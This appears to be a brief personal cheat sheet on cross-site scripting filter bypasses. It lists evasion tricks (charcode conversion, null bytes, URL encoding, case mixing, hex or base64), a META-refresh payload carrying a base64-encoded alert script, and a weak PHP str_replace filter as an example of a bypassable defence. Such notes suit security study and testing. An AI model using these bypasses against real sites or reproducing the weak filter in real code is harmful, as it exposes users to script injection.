blacklist ->  convert all to charcode
maxlength ->  comment
filter    ->  nullbyte(%00)
addslash  ->  query basic or url encode 
&quot;  “
&apos;  ‘
&lt;    <
&gt;    >
&amp;   &
=======================================
<META HTTP-EQUIV="refresh"CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K" = <script>alert('XSS')</script>
========================================
replace :  echo 'Hello ' . str_replace('<script>', '', $_GET['query']);
========================================
developer focus to lower case and upper case in case attacker exploit by pass filter
<script> = <SCRIPT> or mix <ScRiPt>
filter alphabet - > used hex or base64

